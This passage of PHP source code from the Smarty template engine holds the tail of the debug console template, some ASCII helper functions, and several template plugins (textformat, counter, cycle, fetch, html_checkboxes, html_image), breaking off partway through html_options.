            tr:nth-child(even) {
                background-color: #fafafa;
            }

            .exectime {
                font-size: 0.8em;
                font-style: italic;
            }

            #bold div {
                color: black;
                font-weight: bold;
            }

            #blue h3 {
                color: blue;
            }

            #normal div {
                color: black;
                font-weight: normal;
            }

            #table_assigned_vars th {
                color: blue;
                font-weight: bold;
            }

            #table_config_vars th {
                color: maroon;
            }
            {/literal}
        </style>
    </head>
    <body>

    <h1>Smarty {Smarty::SMARTY_VERSION} Debug Console
        -  {if isset($template_name)}{$template_name|debug_print_var nofilter} {/if}{if !empty($template_data)}Total Time {$execution_time|string_format:"%.5f"}{/if}</h1>

    {if !empty($template_data)}
        <h2>included templates &amp; config files (load time in seconds)</h2>
        <div>
            {foreach $template_data as $template}
                <span style="color: brown;">{$template.name}</span>
                <br>&nbsp;&nbsp;<span class="exectime">
                (compile {$template['compile_time']|string_format:"%.5f"}) (render {$template['render_time']|string_format:"%.5f"}) (cache {$template['cache_time']|string_format:"%.5f"})
                 </span>
                <br>
            {/foreach}
        </div>
    {/if}

    <h2>assigned template variables</h2>

    <table id="table_assigned_vars">
        {foreach $assigned_vars as $vars}
            <tr>
                <td>
                    <h3 style="color: blue;">${$vars@key}</h3>
                    {if isset($vars['nocache'])}<strong>Nocache</strong><br>{/if}
                    {if isset($vars['scope'])}<strong>Origin:</strong> {$vars['scope']|debug_print_var nofilter}{/if}
                </td>
                <td>
                    <h3>Value</h3>
                    {$vars['value']|debug_print_var:10:80 nofilter}
                </td>
                <td>
                    {if isset($vars['attributes'])}
                        <h3>Attributes</h3>
                        {$vars['attributes']|debug_print_var nofilter}
                    {/if}
                </td>
         {/foreach}
    </table>

    <h2>assigned config file variables</h2>

    <table id="table_config_vars">
        {foreach $config_vars as $vars}
            <tr>
                <td>
                    <h3 style="color: blue;">#{$vars@key}#</h3>
                    {if isset($vars['scope'])}<strong>Origin:</strong> {$vars['scope']|debug_print_var nofilter}{/if}
                </td>
                <td>
                    {$vars['value']|debug_print_var:10:80 nofilter}
                </td>
            </tr>
        {/foreach}

    </table>
    </body>
    </html>
{/capture}
<script type="text/javascript">
    _smarty_console = window.open("", "console{$targetWindow}", "width=1024,height=600,left={$offset},top={$offset},resizable,scrollbars=yes");
    _smarty_console.document.write("{$debug_output|escape:'javascript' nofilter}");
    _smarty_console.document.close();
</script>
<?php
/**
 * This file is part of the Smarty package.
 *
 * For the full copyright and license information, please view the LICENSE
 * file that was distributed with this source code.
 */
/**
 * Registers some helper/polyfill functions.
 */

const SMARTY_HELPER_FUNCTIONS_LOADED = true;

/**
 * Converts the first characters in $string to uppercase (A-Z) if it is an ASCII lowercase character (a-z).
 *
 * May not be required when running PHP8.2+: https://wiki.php.net/rfc/strtolower-ascii
 *
 * @param $string
 *
 * @return string
 */
function smarty_ucfirst_ascii($string): string {
    return smarty_strtoupper_ascii(substr($string, 0, 1)) . substr($string, 1);
}

/**
 * Converts all uppercase ASCII characters (A-Z) in $string to lowercase (a-z).
 *
 * May not be required when running PHP8.2+: https://wiki.php.net/rfc/strtolower-ascii
 *
 * @param $string
 *
 * @return string
 */
function smarty_strtolower_ascii($string): string {
    return strtr($string, 'ABCDEFGHIJKLMNOPQRSTUVWXYZ', 'abcdefghijklmnopqrstuvwxyz');
}

/**
 * Converts all lowercase ASCII characters (a-z) in $string to uppercase (A-Z).
 *
 * May not be required when running PHP8.2+: https://wiki.php.net/rfc/strtolower-ascii
 *
 * @param $string
 *
 * @return string
 */
function smarty_strtoupper_ascii($string): string {
    return strtr($string, 'abcdefghijklmnopqrstuvwxyz', 'ABCDEFGHIJKLMNOPQRSTUVWXYZ');
}<?php
/**
 * Smarty plugin to format text blocks
 *
 * @package    Smarty
 * @subpackage PluginsBlock
 */
/**
 * Smarty {textformat}{/textformat} block plugin
 * Type:     block function
 * Name:     textformat
 * Purpose:  format text a certain way with preset styles
 *           or custom wrap/indent settings
 * Params:
 *
 * - style         - string (email)
 * - indent        - integer (0)
 * - wrap          - integer (80)
 * - wrap_char     - string ("\n")
 * - indent_char   - string (" ")
 * - wrap_boundary - boolean (true)
 *
 * @link   https://www.smarty.net/manual/en/language.function.textformat.php {textformat}
 *         (Smarty online manual)
 *
 * @param array                    $params   parameters
 * @param string                   $content  contents of the block
 * @param Smarty_Internal_Template $template template object
 * @param boolean                  &$repeat  repeat flag
 *
 * @return string content re-formatted
 * @author Monte Ohrt <monte at ohrt dot com>
 * @throws \SmartyException
 */
function smarty_block_textformat($params, $content, Smarty_Internal_Template $template, &$repeat)
{
    if (is_null($content)) {
        return;
    }
    if (Smarty::$_MBSTRING) {
        $template->_checkPlugins(
            array(
                array(
                    'function' => 'smarty_modifier_mb_wordwrap',
                    'file'     => SMARTY_PLUGINS_DIR . 'modifier.mb_wordwrap.php'
                )
            )
        );
    }
    $style = null;
    $indent = 0;
    $indent_first = 0;
    $indent_char = ' ';
    $wrap = 80;
    $wrap_char = "\n";
    $wrap_cut = false;
    $assign = null;
    foreach ($params as $_key => $_val) {
        switch ($_key) {
            case 'style':
            case 'indent_char':
            case 'wrap_char':
            case 'assign':
                $$_key = (string)$_val;
                break;
            case 'indent':
            case 'indent_first':
            case 'wrap':
                $$_key = (int)$_val;
                break;
            case 'wrap_cut':
                $$_key = (bool)$_val;
                break;
            default:
                trigger_error("textformat: unknown attribute '{$_key}'");
        }
    }
    if ($style === 'email') {
        $wrap = 72;
    }
    // split into paragraphs
    $_paragraphs = preg_split('![\r\n]{2}!', $content);
    foreach ($_paragraphs as &$_paragraph) {
        if (!$_paragraph) {
            continue;
        }
        // convert mult. spaces & special chars to single space
        $_paragraph =
            preg_replace(
                array(
                    '!\s+!' . Smarty::$_UTF8_MODIFIER,
                    '!(^\s+)|(\s+$)!' . Smarty::$_UTF8_MODIFIER
                ),
                array(
                    ' ',
                    ''
                ),
                $_paragraph
            );
        // indent first line
        if ($indent_first > 0) {
            $_paragraph = str_repeat($indent_char, $indent_first) . $_paragraph;
        }
        // wordwrap sentences
        if (Smarty::$_MBSTRING) {
            $_paragraph = smarty_modifier_mb_wordwrap($_paragraph, $wrap - $indent, $wrap_char, $wrap_cut);
        } else {
            $_paragraph = wordwrap($_paragraph, $wrap - $indent, $wrap_char, $wrap_cut);
        }
        // indent lines
        if ($indent > 0) {
            $_paragraph = preg_replace('!^!m', str_repeat($indent_char, $indent), $_paragraph);
        }
    }
    $_output = implode($wrap_char . $wrap_char, $_paragraphs);
    if ($assign) {
        $template->assign($assign, $_output);
    } else {
        return $_output;
    }
}
<?php
/**
 * Smarty plugin
 *
 * @package    Smarty
 * @subpackage PluginsFunction
 */
/**
 * Smarty {counter} function plugin
 * Type:     function
 * Name:     counter
 * Purpose:  print out a counter value
 *
 * @author Monte Ohrt <monte at ohrt dot com>
 * @link   https://www.smarty.net/manual/en/language.function.counter.php {counter}
 *         (Smarty online manual)
 *
 * @param array                    $params   parameters
 * @param Smarty_Internal_Template $template template object
 *
 * @return string|null
 */
function smarty_function_counter($params, $template)
{
    static $counters = array();
    $name = (isset($params[ 'name' ])) ? $params[ 'name' ] : 'default';
    if (!isset($counters[ $name ])) {
        $counters[ $name ] = array('start' => 1, 'skip' => 1, 'direction' => 'up', 'count' => 1);
    }
    $counter =& $counters[ $name ];
    if (isset($params[ 'start' ])) {
        $counter[ 'start' ] = $counter[ 'count' ] = (int)$params[ 'start' ];
    }
    if (!empty($params[ 'assign' ])) {
        $counter[ 'assign' ] = $params[ 'assign' ];
    }
    if (isset($counter[ 'assign' ])) {
        $template->assign($counter[ 'assign' ], $counter[ 'count' ]);
    }
    if (isset($params[ 'print' ])) {
        $print = (bool)$params[ 'print' ];
    } else {
        $print = empty($counter[ 'assign' ]);
    }
    if ($print) {
        $retval = $counter[ 'count' ];
    } else {
        $retval = null;
    }
    if (isset($params[ 'skip' ])) {
        $counter[ 'skip' ] = $params[ 'skip' ];
    }
    if (isset($params[ 'direction' ])) {
        $counter[ 'direction' ] = $params[ 'direction' ];
    }
    if ($counter[ 'direction' ] === 'down') {
        $counter[ 'count' ] -= $counter[ 'skip' ];
    } else {
        $counter[ 'count' ] += $counter[ 'skip' ];
    }
    return $retval;
}
<?php
/**
 * Smarty plugin
 *
 * @package    Smarty
 * @subpackage PluginsFunction
 */
/**
 * Smarty {cycle} function plugin
 * Type:     function
 * Name:     cycle
 * Date:     May 3, 2002
 * Purpose:  cycle through given values
 * Params:
 *
 * - name      - name of cycle (optional)
 * - values    - comma separated list of values to cycle, or an array of values to cycle
 *               (this can be left out for subsequent calls)
 * - reset     - boolean - resets given var to true
 * - print     - boolean - print var or not. default is true
 * - advance   - boolean - whether or not to advance the cycle
 * - delimiter - the value delimiter, default is ","
 * - assign    - boolean, assigns to template var instead of printed.
 *
 * Examples:
 *
 * {cycle values="#eeeeee,#d0d0d0d"}
 * {cycle name=row values="one,two,three" reset=true}
 * {cycle name=row}
 *
 * @link    https://www.smarty.net/manual/en/language.function.cycle.php {cycle}
 *           (Smarty online manual)
 * @author  Monte Ohrt <monte at ohrt dot com>
 * @author  credit to Mark Priatel <mpriatel@rogers.com>
 * @author  credit to Gerard <gerard@interfold.com>
 * @author  credit to Jason Sweat <jsweat_php@yahoo.com>
 * @version 1.3
 *
 * @param array                    $params   parameters
 * @param Smarty_Internal_Template $template template object
 *
 * @return string|null
 */
function smarty_function_cycle($params, $template)
{
    static $cycle_vars;
    $name = (empty($params[ 'name' ])) ? 'default' : $params[ 'name' ];
    $print = (isset($params[ 'print' ])) ? (bool)$params[ 'print' ] : true;
    $advance = (isset($params[ 'advance' ])) ? (bool)$params[ 'advance' ] : true;
    $reset = (isset($params[ 'reset' ])) ? (bool)$params[ 'reset' ] : false;
    if (!isset($params[ 'values' ])) {
        if (!isset($cycle_vars[ $name ][ 'values' ])) {
            trigger_error('cycle: missing \'values\' parameter');
            return;
        }
    } else {
        if (isset($cycle_vars[ $name ][ 'values' ]) && $cycle_vars[ $name ][ 'values' ] !== $params[ 'values' ]) {
            $cycle_vars[ $name ][ 'index' ] = 0;
        }
        $cycle_vars[ $name ][ 'values' ] = $params[ 'values' ];
    }
    if (isset($params[ 'delimiter' ])) {
        $cycle_vars[ $name ][ 'delimiter' ] = $params[ 'delimiter' ];
    } elseif (!isset($cycle_vars[ $name ][ 'delimiter' ])) {
        $cycle_vars[ $name ][ 'delimiter' ] = ',';
    }
    if (is_array($cycle_vars[ $name ][ 'values' ])) {
        $cycle_array = $cycle_vars[ $name ][ 'values' ];
    } else {
        $cycle_array = explode($cycle_vars[ $name ][ 'delimiter' ], $cycle_vars[ $name ][ 'values' ]);
    }
    if (!isset($cycle_vars[ $name ][ 'index' ]) || $reset) {
        $cycle_vars[ $name ][ 'index' ] = 0;
    }
    if (isset($params[ 'assign' ])) {
        $print = false;
        $template->assign($params[ 'assign' ], $cycle_array[ $cycle_vars[ $name ][ 'index' ] ]);
    }
    if ($print) {
        $retval = $cycle_array[ $cycle_vars[ $name ][ 'index' ] ];
    } else {
        $retval = null;
    }
    if ($advance) {
        if ($cycle_vars[ $name ][ 'index' ] >= count($cycle_array) - 1) {
            $cycle_vars[ $name ][ 'index' ] = 0;
        } else {
            $cycle_vars[ $name ][ 'index' ]++;
        }
    }
    return $retval;
}
<?php
/**
 * Smarty plugin
 *
 * @package    Smarty
 * @subpackage PluginsFunction
 */
/**
 * Smarty {fetch} plugin
 * Type:     function
 * Name:     fetch
 * Purpose:  fetch file, web or ftp data and display results
 *
 * @link   https://www.smarty.net/manual/en/language.function.fetch.php {fetch}
 *         (Smarty online manual)
 * @author Monte Ohrt <monte at ohrt dot com>
 *
 * @param array                    $params   parameters
 * @param Smarty_Internal_Template $template template object
 *
 * @throws SmartyException
 * @return string|null if the assign parameter is passed, Smarty assigns the result to a template variable
 */
function smarty_function_fetch($params, $template)
{
    if (empty($params[ 'file' ])) {
        trigger_error('[plugin] fetch parameter \'file\' cannot be empty', E_USER_NOTICE);
        return;
    }
    // strip file protocol
    if (stripos($params[ 'file' ], 'file://') === 0) {
        $params[ 'file' ] = substr($params[ 'file' ], 7);
    }
    $protocol = strpos($params[ 'file' ], '://');
    if ($protocol !== false) {
        $protocol = strtolower(substr($params[ 'file' ], 0, $protocol));
    }
    if (isset($template->smarty->security_policy)) {
        if ($protocol) {
            // remote resource (or php stream, …)
            if (!$template->smarty->security_policy->isTrustedUri($params[ 'file' ])) {
                return;
            }
        } else {
            // local file
            if (!$template->smarty->security_policy->isTrustedResourceDir($params[ 'file' ])) {
                return;
            }
        }
    }
    $content = '';
    if ($protocol === 'http') {
        // http fetch
        if ($uri_parts = parse_url($params[ 'file' ])) {
            // set defaults
            $host = $server_name = $uri_parts[ 'host' ];
            $timeout = 30;
            $accept = 'image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*';
            $agent = 'Smarty Template Engine ' . Smarty::SMARTY_VERSION;
            $referer = '';
            $uri = !empty($uri_parts[ 'path' ]) ? $uri_parts[ 'path' ] : '/';
            $uri .= !empty($uri_parts[ 'query' ]) ? '?' . $uri_parts[ 'query' ] : '';
            $_is_proxy = false;
            if (empty($uri_parts[ 'port' ])) {
                $port = 80;
            } else {
                $port = $uri_parts[ 'port' ];
            }
            if (!empty($uri_parts[ 'user' ])) {
                $user = $uri_parts[ 'user' ];
            }
            if (!empty($uri_parts[ 'pass' ])) {
                $pass = $uri_parts[ 'pass' ];
            }
            // loop through parameters, setup headers
            foreach ($params as $param_key => $param_value) {
                switch ($param_key) {
                    case 'file':
                    case 'assign':
                    case 'assign_headers':
                        break;
                    case 'user':
                        if (!empty($param_value)) {
                            $user = $param_value;
                        }
                        break;
                    case 'pass':
                        if (!empty($param_value)) {
                            $pass = $param_value;
                        }
                        break;
                    case 'accept':
                        if (!empty($param_value)) {
                            $accept = $param_value;
                        }
                        break;
                    case 'header':
                        if (!empty($param_value)) {
                            if (!preg_match('![\w\d-]+: .+!', $param_value)) {
                                trigger_error("[plugin] invalid header format '{$param_value}'", E_USER_NOTICE);
                                return;
                            } else {
                                $extra_headers[] = $param_value;
                            }
                        }
                        break;
                    case 'proxy_host':
                        if (!empty($param_value)) {
                            $proxy_host = $param_value;
                        }
                        break;
                    case 'proxy_port':
                        if (!preg_match('!\D!', $param_value)) {
                            $proxy_port = (int)$param_value;
                        } else {
                            trigger_error("[plugin] invalid value for attribute '{$param_key }'", E_USER_NOTICE);
                            return;
                        }
                        break;
                    case 'agent':
                        if (!empty($param_value)) {
                            $agent = $param_value;
                        }
                        break;
                    case 'referer':
                        if (!empty($param_value)) {
                            $referer = $param_value;
                        }
                        break;
                    case 'timeout':
                        if (!preg_match('!\D!', $param_value)) {
                            $timeout = (int)$param_value;
                        } else {
                            trigger_error("[plugin] invalid value for attribute '{$param_key}'", E_USER_NOTICE);
                            return;
                        }
                        break;
                    default:
                        trigger_error("[plugin] unrecognized attribute '{$param_key}'", E_USER_NOTICE);
                        return;
                }
            }
            if (!empty($proxy_host) && !empty($proxy_port)) {
                $_is_proxy = true;
                $fp = fsockopen($proxy_host, $proxy_port, $errno, $errstr, $timeout);
            } else {
                $fp = fsockopen($server_name, $port, $errno, $errstr, $timeout);
            }
            if (!$fp) {
                trigger_error("[plugin] unable to fetch: $errstr ($errno)", E_USER_NOTICE);
                return;
            } else {
                if ($_is_proxy) {
                    fputs($fp, 'GET ' . $params[ 'file' ] . " HTTP/1.0\r\n");
                } else {
                    fputs($fp, "GET $uri HTTP/1.0\r\n");
                }
                if (!empty($host)) {
                    fputs($fp, "Host: $host\r\n");
                }
                if (!empty($accept)) {
                    fputs($fp, "Accept: $accept\r\n");
                }
                if (!empty($agent)) {
                    fputs($fp, "User-Agent: $agent\r\n");
                }
                if (!empty($referer)) {
                    fputs($fp, "Referer: $referer\r\n");
                }
                if (isset($extra_headers) && is_array($extra_headers)) {
                    foreach ($extra_headers as $curr_header) {
                        fputs($fp, $curr_header . "\r\n");
                    }
                }
                if (!empty($user) && !empty($pass)) {
                    fputs($fp, 'Authorization: BASIC ' . base64_encode("$user:$pass") . "\r\n");
                }
                fputs($fp, "\r\n");
                while (!feof($fp)) {
                    $content .= fgets($fp, 4096);
                }
                fclose($fp);
                $csplit = preg_split("!\r\n\r\n!", $content, 2);
                $content = $csplit[ 1 ];
                if (!empty($params[ 'assign_headers' ])) {
                    $template->assign($params[ 'assign_headers' ], preg_split("!\r\n!", $csplit[ 0 ]));
                }
            }
        } else {
            trigger_error("[plugin fetch] unable to parse URL, check syntax", E_USER_NOTICE);
            return;
        }
    } else {
        $content = @file_get_contents($params[ 'file' ]);
        if ($content === false) {
            throw new SmartyException("{fetch} cannot read resource '" . $params[ 'file' ] . "'");
        }
    }
    if (!empty($params[ 'assign' ])) {
        $template->assign($params[ 'assign' ], $content);
    } else {
        return $content;
    }
}
<?php
/**
 * Smarty plugin
 *
 * @package    Smarty
 * @subpackage PluginsFunction
 */
/**
 * Smarty {html_checkboxes} function plugin
 * File:       function.html_checkboxes.php
 * Type:       function
 * Name:       html_checkboxes
 * Date:       24.Feb.2003
 * Purpose:    Prints out a list of checkbox input types
 * Examples:
 *
 * {html_checkboxes values=$ids output=$names}
 * {html_checkboxes values=$ids name='box' separator='<br>' output=$names}
 * {html_checkboxes values=$ids checked=$checked separator='<br>' output=$names}
 *
 * Params:
 *
 * - name       (optional) - string default "checkbox"
 * - values     (required) - array
 * - options    (optional) - associative array
 * - checked    (optional) - array default not set
 * - separator  (optional) - ie <br> or &nbsp;
 * - output     (optional) - the output next to each checkbox
 * - assign     (optional) - assign the output as an array to this variable
 * - escape     (optional) - escape the content (not value), defaults to true
 *
 * @link    https://www.smarty.net/manual/en/language.function.html.checkboxes.php {html_checkboxes}
 *             (Smarty online manual)
 * @author  Christopher Kvarme <christopher.kvarme@flashjab.com>
 * @author  credits to Monte Ohrt <monte at ohrt dot com>
 * @version 1.0
 *
 * @param array                    $params   parameters
 * @param Smarty_Internal_Template $template template object
 *
 * @return string
 * @uses    smarty_function_escape_special_chars()
 * @throws \SmartyException
 */
function smarty_function_html_checkboxes($params, Smarty_Internal_Template $template)
{
    $template->_checkPlugins(
        array(
            array(
                'function' => 'smarty_function_escape_special_chars',
                'file'     => SMARTY_PLUGINS_DIR . 'shared.escape_special_chars.php'
            )
        )
    );
    $name = 'checkbox';
    $values = null;
    $options = null;
    $selected = array();
    $separator = '';
    $escape = true;
    $labels = true;
    $label_ids = false;
    $output = null;
    $extra = '';
    foreach ($params as $_key => $_val) {
        switch ($_key) {
            case 'name':
            case 'separator':
                $$_key = (string)$_val;
                break;
            case 'escape':
            case 'labels':
            case 'label_ids':
                $$_key = (bool)$_val;
                break;
            case 'options':
                $$_key = (array)$_val;
                break;
            case 'values':
            case 'output':
                $$_key = array_values((array)$_val);
                break;
            case 'checked':
            case 'selected':
                if (is_array($_val)) {
                    $selected = array();
                    foreach ($_val as $_sel) {
                        if (is_object($_sel)) {
                            if (method_exists($_sel, '__toString')) {
                                $_sel = smarty_function_escape_special_chars((string)$_sel->__toString());
                            } else {
                                trigger_error(
                                    'html_checkboxes: selected attribute contains an object of class \'' .
                                    get_class($_sel) . '\' without __toString() method',
                                    E_USER_NOTICE
                                );
                                continue;
                            }
                        } else {
                            $_sel = smarty_function_escape_special_chars((string)$_sel);
                        }
                        $selected[ $_sel ] = true;
                    }
                } elseif (is_object($_val)) {
                    if (method_exists($_val, '__toString')) {
                        $selected = smarty_function_escape_special_chars((string)$_val->__toString());
                    } else {
                        trigger_error(
                            'html_checkboxes: selected attribute is an object of class \'' . get_class($_val) .
                            '\' without __toString() method',
                            E_USER_NOTICE
                        );
                    }
                } else {
                    $selected = smarty_function_escape_special_chars((string)$_val);
                }
                break;
            case 'checkboxes':
                trigger_error(
                    'html_checkboxes: the use of the "checkboxes" attribute is deprecated, use "options" instead',
                    E_USER_WARNING
                );
                $options = (array)$_val;
                break;
            case 'assign':
                break;
            case 'strict':
                break;
            case 'disabled':
            case 'readonly':
                if (!empty($params[ 'strict' ])) {
                    if (!is_scalar($_val)) {
                        trigger_error(
                            "html_options: {$_key} attribute must be a scalar, only boolean true or string '{$_key}' will actually add the attribute",
                            E_USER_NOTICE
                        );
                    }
                    if ($_val === true || $_val === $_key) {
                        $extra .= ' ' . $_key . '="' . smarty_function_escape_special_chars($_key) . '"';
                    }
                    break;
                }
            // omit break; to fall through!
            // no break
            default:
                if (!is_array($_val)) {
                    $extra .= ' ' . $_key . '="' . smarty_function_escape_special_chars($_val) . '"';
                } else {
                    trigger_error("html_checkboxes: extra attribute '{$_key}' cannot be an array", E_USER_NOTICE);
                }
                break;
        }
    }
    if (!isset($options) && !isset($values)) {
        return '';
    } /* raise error here? */
    $_html_result = array();
    if (isset($options)) {
        foreach ($options as $_key => $_val) {
            $_html_result[] =
                smarty_function_html_checkboxes_output(
                    $name,
                    $_key,
                    $_val,
                    $selected,
                    $extra,
                    $separator,
                    $labels,
                    $label_ids,
                    $escape
                );
        }
    } else {
        foreach ($values as $_i => $_key) {
            $_val = isset($output[ $_i ]) ? $output[ $_i ] : '';
            $_html_result[] =
                smarty_function_html_checkboxes_output(
                    $name,
                    $_key,
                    $_val,
                    $selected,
                    $extra,
                    $separator,
                    $labels,
                    $label_ids,
                    $escape
                );
        }
    }
    if (!empty($params[ 'assign' ])) {
        $template->assign($params[ 'assign' ], $_html_result);
    } else {
        return implode("\n", $_html_result);
    }
}

/**
 * @param      $name
 * @param      $value
 * @param      $output
 * @param      $selected
 * @param      $extra
 * @param      $separator
 * @param      $labels
 * @param      $label_ids
 * @param bool $escape
 *
 * @return string
 */
function smarty_function_html_checkboxes_output(
    $name,
    $value,
    $output,
    $selected,
    $extra,
    $separator,
    $labels,
    $label_ids,
    $escape = true
) {
    $_output = '';
    if (is_object($value)) {
        if (method_exists($value, '__toString')) {
            $value = (string)$value->__toString();
        } else {
            trigger_error(
                'html_options: value is an object of class \'' . get_class($value) .
                '\' without __toString() method',
                E_USER_NOTICE
            );
            return '';
        }
    } else {
        $value = (string)$value;
    }
    if (is_object($output)) {
        if (method_exists($output, '__toString')) {
            $output = (string)$output->__toString();
        } else {
            trigger_error(
                'html_options: output is an object of class \'' . get_class($output) .
                '\' without __toString() method',
                E_USER_NOTICE
            );
            return '';
        }
    } else {
        $output = (string)$output;
    }
    if ($labels) {
        if ($label_ids) {
            $_id = smarty_function_escape_special_chars(
                preg_replace(
                    '![^\w\-\.]!' . Smarty::$_UTF8_MODIFIER,
                    '_',
                    $name . '_' . $value
                )
            );
            $_output .= '<label for="' . $_id . '">';
        } else {
            $_output .= '<label>';
        }
    }
    $name = smarty_function_escape_special_chars($name);
    $value = smarty_function_escape_special_chars($value);
    if ($escape) {
        $output = smarty_function_escape_special_chars($output);
    }
    $_output .= '<input type="checkbox" name="' . $name . '[]" value="' . $value . '"';
    if ($labels && $label_ids) {
        $_output .= ' id="' . $_id . '"';
    }
    if (is_array($selected)) {
        if (isset($selected[ $value ])) {
            $_output .= ' checked="checked"';
        }
    } elseif ($value === $selected) {
        $_output .= ' checked="checked"';
    }
    $_output .= $extra . ' />' . $output;
    if ($labels) {
        $_output .= '</label>';
    }
    $_output .= $separator;
    return $_output;
}
<?php
/**
 * Smarty plugin
 *
 * @package    Smarty
 * @subpackage PluginsFunction
 */
/**
 * Smarty {html_image} function plugin
 * Type:     function
 * Name:     html_image
 * Date:     Feb 24, 2003
 * Purpose:  format HTML tags for the image
 * Examples: {html_image file="/images/masthead.gif"}
 * Output:   <img src="/images/masthead.gif" width=400 height=23>
 * Params:
 *
 * - file        - (required) - file (and path) of image
 * - height      - (optional) - image height (default actual height)
 * - width       - (optional) - image width (default actual width)
 * - basedir     - (optional) - base directory for absolute paths, default is environment variable DOCUMENT_ROOT
 * - path_prefix - prefix for path output (optional, default empty)
 *
 * @link    https://www.smarty.net/manual/en/language.function.html.image.php {html_image}
 *          (Smarty online manual)
 * @author  Monte Ohrt <monte at ohrt dot com>
 * @author  credits to Duda <duda@big.hu>
 * @version 1.0
 *
 * @param array                    $params   parameters
 * @param Smarty_Internal_Template $template template object
 *
 * @throws SmartyException
 * @return string
 * @uses    smarty_function_escape_special_chars()
 */
function smarty_function_html_image($params, Smarty_Internal_Template $template)
{
    $template->_checkPlugins(
        array(
            array(
                'function' => 'smarty_function_escape_special_chars',
                'file'     => SMARTY_PLUGINS_DIR . 'shared.escape_special_chars.php'
            )
        )
    );
    $alt = '';
    $file = '';
    $height = '';
    $width = '';
    $extra = '';
    $prefix = '';
    $suffix = '';
    $path_prefix = '';
    $basedir = isset($_SERVER[ 'DOCUMENT_ROOT' ]) ? $_SERVER[ 'DOCUMENT_ROOT' ] : '';
    foreach ($params as $_key => $_val) {
        switch ($_key) {
            case 'file':
            case 'height':
            case 'width':
            case 'dpi':
            case 'path_prefix':
            case 'basedir':
                $$_key = $_val;
                break;
            case 'alt':
                if (!is_array($_val)) {
                    $$_key = smarty_function_escape_special_chars($_val);
                } else {
                    throw new SmartyException(
                        "html_image: extra attribute '{$_key}' cannot be an array",
                        E_USER_NOTICE
                    );
                }
                break;
            case 'link':
            case 'href':
                $prefix = '<a href="' . $_val . '">';
                $suffix = '</a>';
                break;
            default:
                if (!is_array($_val)) {
                    $extra .= ' ' . $_key . '="' . smarty_function_escape_special_chars($_val) . '"';
                } else {
                    throw new SmartyException(
                        "html_image: extra attribute '{$_key}' cannot be an array",
                        E_USER_NOTICE
                    );
                }
                break;
        }
    }
    if (empty($file)) {
        trigger_error('html_image: missing \'file\' parameter', E_USER_NOTICE);
        return;
    }
    if ($file[ 0 ] === '/') {
        $_image_path = $basedir . $file;
    } else {
        $_image_path = $file;
    }
    // strip file protocol
    if (stripos($params[ 'file' ], 'file://') === 0) {
        $params[ 'file' ] = substr($params[ 'file' ], 7);
    }
    $protocol = strpos($params[ 'file' ], '://');
    if ($protocol !== false) {
        $protocol = strtolower(substr($params[ 'file' ], 0, $protocol));
    }
    if (isset($template->smarty->security_policy)) {
        if ($protocol) {
            // remote resource (or php stream, …)
            if (!$template->smarty->security_policy->isTrustedUri($params[ 'file' ])) {
                return;
            }
        } else {
            // local file
            if (!$template->smarty->security_policy->isTrustedResourceDir($_image_path)) {
                return;
            }
        }
    }
    if (!isset($params[ 'width' ]) || !isset($params[ 'height' ])) {
        // FIXME: (rodneyrehm) getimagesize() loads the complete file off a remote resource, use custom [jpg,png,gif]header reader!
        if (!$_image_data = @getimagesize($_image_path)) {
            if (!file_exists($_image_path)) {
                trigger_error("html_image: unable to find '{$_image_path}'", E_USER_NOTICE);
                return;
            } elseif (!is_readable($_image_path)) {
                trigger_error("html_image: unable to read '{$_image_path}'", E_USER_NOTICE);
                return;
            } else {
                trigger_error("html_image: '{$_image_path}' is not a valid image file", E_USER_NOTICE);
                return;
            }
        }
        if (!isset($params[ 'width' ])) {
            $width = $_image_data[ 0 ];
        }
        if (!isset($params[ 'height' ])) {
            $height = $_image_data[ 1 ];
        }
    }
    if (isset($params[ 'dpi' ])) {
        if (strstr($_SERVER[ 'HTTP_USER_AGENT' ], 'Mac')) {
            // FIXME: (rodneyrehm) wrong dpi assumption
            // don't know who thought this up… even if it was true in 1998, it's definitely wrong in 2011.
            $dpi_default = 72;
        } else {
            $dpi_default = 96;
        }
        $_resize = $dpi_default / $params[ 'dpi' ];
        $width = round($width * $_resize);
        $height = round($height * $_resize);
    }
    return $prefix . '<img src="' . $path_prefix . $file . '" alt="' . $alt . '" width="' . $width . '" height="' .
           $height . '"' . $extra . ' />' . $suffix;
}
<?php
/**
 * Smarty plugin
 *
 * @package    Smarty
 * @subpackage PluginsFunction
 */
/**
 * Smarty {html_options} function plugin
 * Type:     function
 * Name:     html_options
 * Purpose:  Prints the list of <option> tags generated from
 *           the passed parameters
 * Params:
 *
 * - name       (optional) - string default "select"
 * - values     (required) - if no options supplied) - array
 * - options    (required) - if no values supplied) - associative array
 * - selected   (optional) - string default not set
 * - output     (required) - if not options supplied) - array
 * - id         (optional) - string default not set
 * - class      (optional) - string default not set
 *
 * @link   https://www.smarty.net/manual/en/language.function.html.options.php {html_image}
 *           (Smarty online manual)
 * @author Monte Ohrt <monte at ohrt dot com>
 * @author Ralf Strehle (minor optimization) <ralf dot strehle at yahoo dot de>
 *
 * @param array                     $params parameters
 *
 * @param \Smarty_Internal_Template $template
 *
 * @return string
 * @uses   smarty_function_escape_special_chars()
 * @throws \SmartyException
 */
function smarty_function_html_options($params, Smarty_Internal_Template $template)
{
    $template->_checkPlugins(
        array(
            array(
                'function' => 'smarty_function_escape_special_chars',
                'file'     => SMARTY_PLUGINS_DIR . 'shared.escape_special_chars.php'
            )
        )
    );
    $name = null;
    $values = null;
    $options = null;
    $selected = null;
    $output = null;
    $id = null;
    $class = null;
    $extra = '';
    foreach ($params as $_key => $_val) {
        switch ($_key) {
            case 'name':
            case 'class':
            case 'id':
                $$_key = (string)$_val;
                break;
            case 'options':
                $options = (array)$_val;
                break;
            case 'values':
            case 'output':
                $$_key = array_values((array)$_val);
                break;
            case 'selected':
                if (is_array($_val)) {
                    $selected = array();
                    foreach ($_val as $_sel) {
                        if (is_object($_sel)) {
                            if (method_exists($_sel, '__toString')) {
                                $_sel = smarty_function_escape_special_chars((string)$_sel->__toString());
                            } else {
                                trigger_error(
                                    'html_options: selected attribute contains an object of class \'' .
                                    get_class($_sel) . '\' without __toString() method',
                                    E_USER_NOTICE
                                );
                                continue;
                            }
                        } else {
                            $_sel = smarty_function_escape_special_chars((string)$_sel);
                        }
                        $selected[ $_sel ] = true;
                    }
                } elseif (is_object($_val)) {
                    if (method_exists($_val, '__toString')) {
                        $selected = smarty_function_escape_special_chars((string)$_val->__toString());
                    } else {
                        trigger_error(
                            'html_options: selected attribute is an object of class \'' . get_class($_val) .
                            '\' without __toString() method',
                            E_USER_NOTICE
                        );
                    }
                } else {
